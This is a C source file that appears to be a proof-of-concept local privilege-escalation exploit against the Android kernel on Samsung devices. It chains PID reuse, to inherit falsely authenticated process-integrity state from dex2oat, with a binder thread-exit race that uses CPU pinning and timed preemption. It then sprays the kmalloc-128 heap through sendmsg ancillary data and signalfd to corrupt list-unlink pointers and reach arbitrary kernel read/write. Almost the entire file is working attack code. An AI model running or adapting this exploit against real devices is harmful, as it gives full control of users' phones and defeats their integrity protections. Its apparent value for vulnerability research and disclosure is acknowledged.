#include "common.h"

// from kernel sources
#define GOLDEN_RATIO_32 0x61C88647
#define PROCA_TASKS_TABLE_SHIFT 10
static inline unsigned int proca_hash_32(unsigned int val) {
  return val * GOLDEN_RATIO_32;
}
static unsigned long calculate_pid_hash(pid_t pid) {
  return proca_hash_32(pid) >> (32 - PROCA_TASKS_TABLE_SHIFT);
}
struct binder_node_debug_info {
  __u64 ptr;
  __u64 cookie;
  __u32 has_strong_ref;
  __u32 has_weak_ref;
};
#define BINDER_GET_NODE_DEBUG_INFO  _IOWR('b', 11, struct binder_node_debug_info)
#define BINDER_THREAD_EXIT    _IOW('b', 8, __s32)
#ifndef EFD_SEMAPHORE // apparently android's NDK is missing this?
#define EFD_SEMAPHORE (1 << 0)
#endif


#define PID_MAX 32768 // correct on a50, ymmv on other devices
#define NUM_PROCESS_BINDER_FDS 1
#define NUM_THREAD_BINDER_FDS 1
#define NUM_BINDER_FDS (NUM_PROCESS_BINDER_FDS + NUM_THREAD_BINDER_FDS)
// Bump this up if you want to see scheduling delays on the order of
// milliseconds. Going very high would require extra engineering to
// circumvent file descriptor table size limits.
#define NUM_BINDER_SPAM 400
#define NR_COLLECT_THREADS 8
#define SPAM_THREADS 10000

// Used for first side of the race (BINDER_THREAD_EXIT) and the task that
// interrupts it. Followed by reallocation spam, so the THREAD_BINDER_FDS tasks
// should be allocated here.
#define MAIN_CPU 0
// Dedicated CPU for a busyloop that sends IPIs to the MAIN_CPU in small
// intervals.
#define CLOCK_CPU 1
// Runs the second side of the race (close binder fd) when signalled by
// MAIN_CPU.
// ->release will run on this CPU, followed by reallocation spam, so the
// PROCESS_BINDER_FDS tasks should be allocated on this CPU.
#define SECOND_SIDE_CPU 2

// shared memory between all our processes
static struct {
  // The first NUM_PROCESS_BINDER_FDS of these are /dev/binder opened by the
  // process they should hold a reference on. When they are closed, they will
  // drop that reference from global work context (so these can't race with each
  // other).
  // The other NUM_THREAD_BINDER_FDS hold a reference on the target process
  // through a binder_thread. These references can be released synchronously via
  // BINDER_THREAD_EXIT from a task with the same PID.
  int binder_fds[NUM_BINDER_FDS];
  int binder_fds_used;
  // PIDs of a bunch of threads we create to reduce the time for repeatedly
  // cycling through the PID space.
  int spam_threads[SPAM_THREADS];
  // Number of tasks to which we're holding references through binder where the
  // PID hashes to target_pid_hash (and therefore hash bucket collisions occur).
  int garbage_fds_used;
} *S;

// The PID for which we're collecting binder FDs.
static pid_t target_pid = -1;
// == calculate_pid_hash(target_pid)
static int target_pid_hash = -1;
// First the pid of the pre-parent (preparent_fn()), then the PID of the
// parent (parent_fn()).
static int parent_pid = -1;

static void tlog(char *str, int cpu) {
  uint64_t t = getmicros();
  unsigned long secs = t / 1000000;
  unsigned long usecs = t % 1000000;
  printf("[%lu.%06lu] [c%d] %s", secs, usecs, cpu, str);
}

static void pin_to_uncalm_cpus(void) {
  cpu_set_t cset;
  CPU_ZERO(&cset);
  for (int cpu=0; cpu<8; cpu++) if (cpu != MAIN_CPU && cpu != SECOND_SIDE_CPU)
    CPU_SET(cpu, &cset);
  SYSCHK(sched_setaffinity(0, sizeof(cpu_set_t), &cset));
}

static void efd_wake(int fd) {
  uint64_t val = 1;
  if (write(fd, &val, sizeof(val)) != sizeof(val)) err(1, "efd_wake");
}
static void efd_wait(int fd, const char *site) {
  uint64_t val;
  while (1) {
    errno = 0;
    ssize_t read_res = read(fd, &val, sizeof(val));
    if (read_res != sizeof(val)) {
      if (1/*errno == EAGAIN || errno == EINTR*/) {
        continue;
      } else {
        err(1, "efd_wait(%s==%d) = %d", site, fd, (int)read_res);
      }
    }
    break;
  }
}

static int pid_cycling_dummy_child_fn(void *dummy) {
  _exit(0);
}

static int first_child_fn(void *dummy) {
  S->binder_fds[0] = SYSCHK(open("/dev/binder", O_RDWR));
  S->binder_fds_used = 1;
  return 0;
}

static int child_fn(void *dummy) {
  pid_t my_pid = getpid();
  if (calculate_pid_hash(my_pid) != target_pid_hash)
    _exit(0);
  prctl(PR_SET_NAME, "child_fn");

  if (my_pid == target_pid) {
    /* atomically reserve a slot in S->binder_fds, then put the fd in there */
    int binder_idx = __sync_fetch_and_add(&S->binder_fds_used, 1);
    if (binder_idx < NUM_PROCESS_BINDER_FDS) {
      // WARNING WARNING WARNING first (and only?) iteration in first_child_fn()
      int binder_fd = SYSCHK(open("/dev/binder", O_RDWR));
      S->binder_fds[binder_idx] = binder_fd;
    } else if (binder_idx < NUM_BINDER_FDS) {
#ifdef PIXEL_DEBUG
      prctl(0xf00d0001); // mark allocation
#endif
      if (ioctl(S->binder_fds[binder_idx], BINDER_GET_NODE_DEBUG_INFO, 0xbad) != -1 || errno != EFAULT)
        err(1, "garbage fd dummy ioctl");
    }
  } else {
    SYSCHK(open("/dev/binder", O_RDWR));
    __sync_fetch_and_add(&S->garbage_fds_used, 1);
  }
  printf("\rhave %d/%d fds, plus %d/%d hash bucket spam fds...",
    *(volatile int*)&S->binder_fds_used, NUM_BINDER_FDS,
    *(volatile int *)&S->garbage_fds_used, NUM_BINDER_SPAM);

  return 0;
}

#define STACK_PARENT 0
#define STACK_DELEGATED_PARENT 1
#define STACK_CHILD 2
#define STACK_SECOND_SIDE 3
#define STACK_CONNECTME_YIELDER 4
#define STACK_CONNECTME_DATA_BUFFER 5
#define STACK_RECVMSG_CLOBBERME 6
#define STACK_WRITEV_CLOBBERME 7
static pid_t do_clone(int (*fn)(void*), int stack_idx, bool shared_vm, void *arg) {
  static char stacks[8][8*1024*1024] __attribute__((aligned(16)));
  int clone_flags = CLONE_FILES|CLONE_FS|CLONE_IO|CLONE_SYSVSEM|
                    SIGCHLD|
                    (shared_vm ? CLONE_VM|CLONE_SIGHAND : 0);
  pid_t pid = SYSCHK(clone(fn, stacks[stack_idx] + sizeof(stacks[stack_idx]), clone_flags, arg));
  return pid;
}

/* skip to the next currently-unused PID */
static int pid_increment(int pid) {
  do {
    pid++;
    if (pid >= PID_MAX)
      pid = pid - PID_MAX + 1;
  } while (syscall(__NR_tkill, pid, 0) != -1 || errno != ESRCH);
  return pid;
}
static int delegated_parent_fn(void *dummy) {
  set_pdeathsig();
  prctl(PR_SET_NAME, "delegated_parent_fn");
  int status;

  pid_t last_child = -1;
  while (*(volatile int *)&S->garbage_fds_used < NUM_BINDER_SPAM) {
    // Figure out whether the child we're going to create might allocate a PID
    // for which we want to allocate a binder FD. If not, we can use CLONE_VM to
    // make the clone much cheaper.
    bool near_real_target = false, near_collision_target = false;
    if (last_child == -1) {
      // empty
    } else {
      int predicted_pid = last_child;
      for (int i=0; i<16; i++) {
        predicted_pid = pid_increment(predicted_pid);
        if (predicted_pid == target_pid) {
          near_real_target = true;
          break;
        } else if (calculate_pid_hash(predicted_pid) == target_pid_hash) {
          near_collision_target = true;
          break;
        }
      }
    }

    pid_t child;
    int racy_fds_used = *(volatile int *)&S->binder_fds_used;
    if ((near_real_target/* && racy_fds_used < NUM_BINDER_FDS*/) || near_collision_target) {
      bool on_calm_cpu = false;
      if (near_real_target) {
        if (racy_fds_used < NUM_PROCESS_BINDER_FDS) {
          // doesn't matter which CPU the allocation happens on; we'll never free this if the race works
          //pin_to(SECOND_SIDE_CPU);
          //on_calm_cpu = true;
        } else if (racy_fds_used < NUM_BINDER_FDS) {
          pin_to(SECOND_SIDE_CPU); // both reallocations must happen here
          on_calm_cpu = true;
          //prctl(PR_SET_NAME, "MAGICFORK");
        }
      }
      child = do_clone(child_fn, STACK_CHILD, false, NULL);
      if (on_calm_cpu) {
        pin_to_uncalm_cpus();
        //prctl(PR_SET_NAME, "proca-race");
      }
    } else {
      child = do_clone(pid_cycling_dummy_child_fn, STACK_CHILD, true, NULL);
      if (child == target_pid && racy_fds_used < NUM_BINDER_FDS)
        puts("whoops, shot past");
    }
    if (waitpid(child, &status, 0) != child) err(1, "wait");
    last_child = child;
  }
  //printf("delegated_parent_fn exiting...\n");
  return 0;
}

static int spam_fn(void *arg) {
  /* don't hog PIDs that we want for our hash bucket spam */
  if (calculate_pid_hash(getpid()) == target_pid_hash)
    exit(0);
  prctl(PR_SET_NAME, "spam_fn");

  pause();
  /* exit on SIGUSR1, we have an empty signal handler for that */
  return 0;
}

static volatile int releasing_state = 0;
static pid_t clock_pid;
static int first_race_side_start_efd = -1;

static int release_thread_fds_(void *dummy) {
  if (getpid() != target_pid) _exit(0);
  prctl(PR_SET_NAME, "release_thread_fds_");

  efd_wait(first_race_side_start_efd, "release_thread_fds_");

  set_pdeathsig();
  // pin us and our parent on a single CPU
  pin_to(MAIN_CPU);
  struct sched_param param = { .sched_priority = 0 };
  SYSCHK(sched_setscheduler(0, SCHED_IDLE, &param));

  /* without this last_kmsg will be flooded with thread stacks and the
   * interesting stuff is gone */
  for (int i=0; i<SPAM_THREADS; i++)
    syscall(__NR_tkill, S->spam_threads[i], SIGUSR1);

  int parent_stack_fd = SYSCHK(open(tprintf("/proc/%d/stack", getppid()), O_RDONLY));
  char parent_stack[1000];

  printf("pinning our executable in memory...\n");
  int maps_fd = SYSCHK(open("/proc/self/maps", O_RDONLY));
  char maps_buf[0x1000];
  int maps_len = SYSCHK(read(maps_fd, maps_buf, sizeof(maps_buf)-1));
  printf("  got %d bytes of maps\n", maps_len);
  maps_buf[maps_len] = '\0';
  close(maps_fd);
  char *p = maps_buf;
  while (1) {
    char *p2 = strchr(p, '\n');
    if (!p2) break;
    *p2 = '\0';
    if (strchr(p, '/')) {
      printf("  FILE MAPPING: %s\n", p);
      char *start_addr_end;
      unsigned long start_addr = strtol(p, &start_addr_end, 16);
      assert(*start_addr_end == '-');
      unsigned long end_addr = strtol(start_addr_end+1, NULL, 16);
      printf("    0x%lx - 0x%lx\n", start_addr, end_addr);
      SYSCHK(mlock((void*)start_addr, end_addr - start_addr));
    }
    p = p2 + 1;
  }

  printf("waiting 5s before releasing binder threads...\n");
  sleep(5);

  releasing_state = 1;

  tlog("about to start first race side\n", MAIN_CPU);
#ifdef PIXEL_DEBUG
  prctl(0xf00d0003, target_pid);
  system("grep '^kmalloc-128' /proc/slabinfo");
#endif

  tlog("spinning...\n", MAIN_CPU);
  // I'm not actually sure whether this makes sense
  uint64_t spin_end_time = getmicros() + 1000*1000;
  while (getmicros() < spin_end_time) /*spin*/;

  uint64_t pre_ioctl_time = getmicros();
  tlog("starting first race side\n", MAIN_CPU);
  SYSCHK(ioctl(S->binder_fds[1], BINDER_THREAD_EXIT, 0));
  int parent_stack_len = SYSCHK(pread(parent_stack_fd, parent_stack, sizeof(parent_stack)-1, 0));
  parent_stack[parent_stack_len] = '\0';
  tlog("first race side is definitely over now (BINDER_THREAD_EXIT returned)\n", MAIN_CPU);
  printf("PARENT STACK AT END:\n<<<<<<<<\n%s>>>>>>>>\n", parent_stack);
#ifdef PIXEL_DEBUG
  prctl(0xf00d0003, target_pid);
#endif
  uint64_t post_ioctl_time = getmicros();
  printf("releasing one binder thread took %lu us\n", post_ioctl_time - pre_ioctl_time);

  releasing_state = 2;
  SYSCHK(kill(clock_pid, SIGKILL));

  return 0;
}

static int clock_ring_fd = -1;
static int clock_rearm_fd = -1;
static int second_race_side_trigger = -1;

static int clock_fn(void *dummy) {
  pin_to(CLOCK_CPU);
  set_pdeathsig();
  prctl(PR_SET_NAME, "clock_fn");

  while (releasing_state == 0) /*empty*/;
  uint64_t last_wake = 0;
  while (1) {
    uint64_t cur_time = getmicros();
    if (cur_time - last_wake < 2)
      continue;
    efd_wake(clock_ring_fd);
    efd_wait(clock_rearm_fd, "clock_rearm_fd");
    last_wake = getmicros();
  }
  efd_wake(clock_ring_fd);
  return 0;
}

static struct unlink_pair unlink_pair;

// The basic idea of using the sendmsg() ancillary buffer for heap spraying is
// described e.g. in
// <https://blog.lexfo.fr/cve-2017-11176-linux-kernel-exploitation-part3.html>;
// however, instead of blocking the sendmsg() call (which requires one thread
// per sprayed allocation), we try to immediately get the allocation freed again
// and reallocate it as a signalfd context, which consists of a single
// `unsigned long` and leaves everything else untouched.
// This works because kmalloc-128 IS THE SMALLEST KMALLOC SLAB SIZE ON AARCH64.
// (Yes, that's kinda inefficient.)
int spam_dummy_udp_sock = -1; /* unconnected UDP socket */
static int spam_one_controlled_allocation(void) {
  unsigned long spam_data[] = {
    /* 0x00 (dontcare)     */ 0, /* CLOBBERED BY SIGNALFD*/
    /* 0x08 (free)         */ 0,
    /* 0x10 (dontcare)     */ 0x1337133713371337UL,
    /* 0x18 (free)         */ 0,
    /* 0x20 (dontcare)     */ 0,
    /* 0x28 (free)         */ 0,
    /* 0x30 (dontcare)     */ 0,
    /* 0x38 (fput or 0)    */ 0,
    /* 0x40 (unlink1 next) */ unlink_pair.next,
    /* 0x48 (unlink1 pprev)*/ unlink_pair.pprev,
    /* 0x50 (unlink2 next) */ 0,
    /* 0x58 (unlink2 pprev)*/ 0,
    /* 0x60 */                0,
    /* 0x68 */                0,
    /* 0x70 */                0,
    /* 0x78 */                0
  };
  struct iovec iovec = {
    .iov_base = 0, .iov_len = 0x10000 /* UDP refuses lengths >0xffff*/
  };
  struct msghdr msghdr = {
    .msg_name = NULL,
    .msg_namelen = 0,
    .msg_iov = &iovec,
    .msg_iovlen = 1,
    .msg_control = spam_data,
    .msg_controllen = sizeof(spam_data),
    .msg_flags = 0
  };
  sendmsg(spam_dummy_udp_sock, &msghdr, 0);
  sigset_t sigset;
  sigemptyset(&sigset);
  int fd = SYSCHK(signalfd(-1, &sigset, 0/*set 1 for spam debugging assist*/));
  return fd;
}

static volatile int second_race_side_done = 0;

static int signalfd_spam_trigger = -1;
static int cpu_heap_spray_fn(void *cpu_) {
  set_pdeathsig();
  prctl(PR_SET_NAME, "cpu_heap_spray_fn");

  /* remove it from our unshared fd table so that close() on the original fdtable triggers ->release() */
  close(S->binder_fds[0]);

  pin_to((long)cpu_);
  struct pollfd pfd = { .fd = signalfd_spam_trigger, .events = POLLIN };
  SYSCHK(poll(&pfd, 1, -1));
  if ((long)cpu_ == MAIN_CPU) {
    while (releasing_state != 2) /*spin*/;
    while (1) pause();
  }
  tlog("CPU SPRAY WAKING\n", (long)cpu_);
  for (int i=0; i<2000; i++)
    spam_one_controlled_allocation();
  __sync_fetch_and_add(&second_race_side_done, 1);
  tlog("CPU SPRAY DONE\n", (long)cpu_);
  while (1) pause();
}

static pid_t second_side_pid;
static int second_side_binder;
static int pre_second_side_fn(void *dummy) {
  second_side_pid = syscall(__NR_gettid);
  /*
   * We don't want our leader (which uses target_pid) to go away, otherwise we'd
   * trigger the PROCA task-freeing hook for target_pid.
   * Luckily the binder instance we're creating here will take a reference on
   * our leader from its binder_proc, so we don't have to do anything special.
   */
  second_side_binder = SYSCHK(open("/dev/binder", O_RDWR|O_CLOEXEC));
  if (ioctl(second_side_binder, BINDER_GET_NODE_DEBUG_INFO, 0xbad) != -1 || errno != EFAULT)
    err(1, "garbage fd dummy ioctl");
  execl("/proc/self/exe", "EXEC-THEN-EXIT", NULL);
  err(1, "execl failed");
}
static int pre_second_side_leader_fn(void *dummy) {
  static char child_stack[0x20000] __attribute__((aligned(16)));
  if (getpid() != target_pid) _exit(0);

  /* As long as this works, the parent will never run again. */
  int clone_flags = CLONE_FILES|CLONE_FS|CLONE_IO|CLONE_SYSVSEM|
                    SIGCHLD|CLONE_VM|CLONE_SIGHAND|CLONE_THREAD|CLONE_VFORK;
  clone(pre_second_side_fn, child_stack+sizeof(child_stack), clone_flags, NULL);
  err(1, "vfork clone returned?");
}

static int second_race_side_fn(void *dummy) {
  if (getpid() != second_side_pid)
    _exit(0);

  printf("second_race_side_fn is running now\n");
  prctl(PR_SET_NAME, "second_race_side_fn");
  set_pdeathsig();
  pin_to(SECOND_SIDE_CPU);

  efd_wait(second_race_side_trigger, "second_race_side_trigger");

  tlog("SECOND SIDE EXECUTING\n", SECOND_SIDE_CPU);
  SYSCHK(ioctl(second_side_binder, BINDER_THREAD_EXIT, 0));
  tlog("SECOND SIDE DONE\n", SECOND_SIDE_CPU);

  // wake up the iovec spam threads
  SYSCHK(eventfd_write(signalfd_spam_trigger, 1));

  while (1) pause();
}

static void release_thread_fds(void) {
  int status;

  signalfd_spam_trigger = SYSCHK(eventfd(0, EFD_SEMAPHORE));
  clock_ring_fd = SYSCHK(eventfd(0, EFD_SEMAPHORE));
  clock_rearm_fd = SYSCHK(eventfd(0, EFD_SEMAPHORE|EFD_NONBLOCK));
  second_race_side_trigger = SYSCHK(eventfd(0, EFD_SEMAPHORE|EFD_NONBLOCK));
  clock_pid = do_clone(clock_fn, STACK_CHILD, true, NULL);
  first_race_side_start_efd = SYSCHK(eventfd(0, EFD_SEMAPHORE));

  tlog("attempting PID reuse for pre_second_side_leader_fn...\n", -1);
  while (1) {
    pid_t child = do_clone(pre_second_side_leader_fn, STACK_DELEGATED_PARENT, true, NULL);
    SYSCHK(waitpid(child, &status, 0));
    if (child == target_pid)
      break;
  }
  assert(second_side_pid != 0);
  printf("second_side_pid = %d\n", second_side_pid);
  tlog("  pre_second_side_leader_fn is done\n", -1);

  tlog("attempting PID reuse for release_thread_fds_...\n", -1);
  while (1) {
    pid_t child = do_clone(release_thread_fds_, STACK_DELEGATED_PARENT, true, NULL);
    if (child == target_pid)
      break;
    SYSCHK(waitpid(child, &status, 0));
  }
  tlog("  PID reuse successful for release_thread_fds_\n", -1);

  tlog("attempting PID reuse for second_race_side_fn...\n", -1);
  while (1) {
    pid_t child = do_clone(second_race_side_fn, STACK_SECOND_SIDE, true, NULL);
    if (child == second_side_pid)
      break;
    if (waitpid(child, &status, 0) != child) err(1, "waitpid");
  }
  tlog("  PID reuse successful for second_race_side_fn\n", -1);

  tlog("allocating heap spray tasks...\n", -1);
  for (int i=0; i<8; i++) {
    static char stacks[8][0x20000] __attribute__((aligned(16)));
    /*
    if (i == MAIN_CPU)
      continue;
      */
    int tflags = /*CLONE_FILES|*/CLONE_FS|CLONE_IO|CLONE_SIGHAND|CLONE_SYSVSEM|
                 CLONE_THREAD|CLONE_VM;
    void *tstack = stacks[i] + sizeof(stacks[i]);
    SYSCHK(clone(cpu_heap_spray_fn, tstack, tflags, (void*)(long)i));
  }

  // pin both us and the releasing thread onto a single CPU
  pin_to(MAIN_CPU);

  char stack_path[100];
  sprintf(stack_path, "/proc/%d/stack", target_pid);
  int stack_fd = SYSCHK(open(stack_path, O_RDONLY));
  char stack_buf[1000];

  efd_wake(first_race_side_start_efd);

  while (releasing_state < 2) {
    efd_wait(clock_ring_fd, "clock_ring_fd");
    int read_res = pread(stack_fd, stack_buf, sizeof(stack_buf)-1, 0);
    if (read_res == -1) {
      if (errno == ESRCH) {
        puts("got ESRCH in polling loop");
        break;
      }
      err(1, "pread stack");
    }
    stack_buf[read_res] = '\0';
    char *p = strchr(stack_buf, '\n');
    if (p) {
      p = strchr(p, ' ');
      char *line_end = strchr(p, '\n');
      if (line_end)
        *line_end = '\0';
    }

    if (p) {
      #define STACK_NEEDLE "proca_table_get_by_pid+"
      if (strncmp(p+1, STACK_NEEDLE, strlen(STACK_NEEDLE)) == 0) {
        tlog("PREEMPTED IN CRITICAL REGION\n", MAIN_CPU);
        prctl(0xf00d0004, target_pid);
        efd_wake(second_race_side_trigger);
        // wait for heap spray in all other threads to finish before we do it
        // (and potentially block, letting the idle thread continue running)

        while (second_race_side_done != 7) /* spin */;

        for (int i=0; i<1000; i++)
          spam_one_controlled_allocation();
        tlog("MAIN CPU DONE SPAMMING\n", MAIN_CPU);

        break;
      }
    } else {
      printf("stack_buf empty???\n");
    }
    efd_wake(clock_rearm_fd);
  }

  if (waitpid(target_pid, &status, 0) != target_pid) err(1, "waitpid");

  puts("release_thread_fds done, sleeping for 5s...");
  sleep(5);
  puts("done sleeping. and still alive, yay!");
}

static void empty_handler(int sig) {}

// The pre-parent process executes dex2oat (gaining authentication), then dies,
// but its task_struct doesn't go away because binder holds a reference to it,
// so the authentication of the PID is preserved and can be reused by the new
// parent (running parent_fn()) with the same PID.
static int preparent_fn(void *dummy) {
  set_pdeathsig();
  prctl(PR_SET_NAME, "preparent_fn");
  SYSCHK(open("/dev/binder", O_RDWR|O_CLOEXEC));
  // Intentionally leak the fd into the main process to keep the preparent's
  // authentication alive for the parent.
#ifdef PIXEL_DEBUG
  SYSCHK(prctl(0xf00d));
  exit(0);
#else
  execl("/system/bin/dex2oat", "dex2oat", "--blah", NULL);
  err(1, "execl failed");
#endif
}

static void handle_segv(int sig, siginfo_t *info, void *uctx_) {
  ucontext_t *uctx = uctx_;
  printf("got SIGSEGV (code=%d)\n", info->si_code);
  printf("PC=0x%llx\n", uctx->uc_mcontext.pc);
  printf("LR=0x%llx\n", uctx->uc_mcontext.regs[30]);
  if (info->si_code == SEGV_MAPERR) {
    printf("SEGV_MAPERR: fault on access to %p\n", info->si_addr);
  }
  raise(SIGKILL);
}

static int parent_fn() {
  int status;

  if (getpid() != parent_pid)
    _exit(42);
  prctl(PR_SET_NAME, "parent_fn");

  set_pdeathsig();
  tlog("reallocated pid for parent\n", -1);

  // This thread is (falsely) authenticated.
  // Now fork off children targeting a different PID, copying authentication
  // info into each child.
  // WARNING: For forks that should copy authentication info, we can't use
  // CLONE_VM, that inhibits the copying (see task_integrity_apply()).

  // first, launch a single child to figure out what PID we want to target...
  target_pid = do_clone(first_child_fn, STACK_CHILD, false, NULL);
  if (waitpid(target_pid, &status, 0) != target_pid) err(1, "waitpid");
  target_pid_hash = calculate_pid_hash(target_pid);
  printf("target_pid = %d, target_pid_hash = %d\n", target_pid, target_pid_hash);

  // spam threads to consume at least some of the PID space; we can consume
  // about 40% of the entire PID space, so this isn't entirely meaningless.
  signal(SIGUSR1, empty_handler); // interrupt pause() on incoming signal
  for (int i=0; i<SPAM_THREADS; i++) {
    static char tiny_stacks[SPAM_THREADS][0x8000] __attribute__((aligned(16)));
    int tflags = CLONE_FILES|CLONE_FS|CLONE_IO|CLONE_SIGHAND|CLONE_SYSVSEM|
                 CLONE_THREAD|CLONE_VM;
    void *tstack = tiny_stacks[i] + sizeof(tiny_stacks[i]);
    S->spam_threads[i] = SYSCHK(clone(spam_fn, tstack, tflags, NULL));
  }
  tlog("spam threads allocated\n", -1);

  // Delegate the creation of children to several workers so that stuff goes
  // faster.
  for (int i=0; i<NR_COLLECT_THREADS; i++)
    do_clone(delegated_parent_fn, STACK_DELEGATED_PARENT, false, NULL);
  for (int i=0; i<NR_COLLECT_THREADS; i++)
    SYSCHK(wait(&status));
  printf("\n");
  tlog("fds set up.\n", -1);

  // We're done collecting binder fds, now use them to trigger the bug.
  release_thread_fds();

  arbitrary_rw_demo();

  exit(0);
}

int main(int argc, char **argv) {
  setbuf(stdout, NULL);
  setbuf(stderr, NULL);

  if (strcmp(argv[0], "EXEC-THEN-EXIT") == 0)
    return 0;

  system("cat /proc/version");

#ifdef PIXEL_DEBUG
  system("grep '^kmalloc-128' /proc/slabinfo");
#endif

  /* for debugging */
  struct sigaction segv_action = {
    .sa_sigaction = handle_segv,
    .sa_flags = SA_SIGINFO
  };
  SYSCHK(sigaction(SIGSEGV, &segv_action, NULL));

  unlink_pair = prepare_unlink();

  tlog("infoleak done, starting proca trigger part of the PoC\n", -1);

  spam_dummy_udp_sock = SYSCHK(socket(AF_INET, SOCK_DGRAM, 0));

#ifdef PIXEL_DEBUG
  prctl(0xf00d0001); // clear previous mark
#endif

  prctl(PR_SET_NAME, "proca-race");
  pin_to_uncalm_cpus();

  S = mmap(NULL, (sizeof(*S)+0xfffUL)&~0xfffUL, PROT_READ|PROT_WRITE,
           MAP_SHARED|MAP_ANONYMOUS, -1, 0);
  if (S == MAP_FAILED) err(1, "mmap shared");

  S->binder_fds[1] = SYSCHK(open("/dev/binder", O_RDWR));

  // launch the pre-parent to make a PID authenticated
  parent_pid = do_clone(preparent_fn, STACK_PARENT, true, NULL);
  int status;
  SYSCHK(waitpid(parent_pid, &status, 0));
  tlog("pre-parent done, reallocating pid for parent...\n", -1);

  // reuse pre-parent's PID for parent (which will then be falsely
  // authenticated)
  pid_t new_parent;
  do {
    new_parent = do_clone(parent_fn, STACK_PARENT, true, NULL);
    SYSCHK(waitpid(new_parent, &status, 0));
  } while (new_parent != parent_pid);
  tlog("parent has exited\n", -1);
  return 0;
}
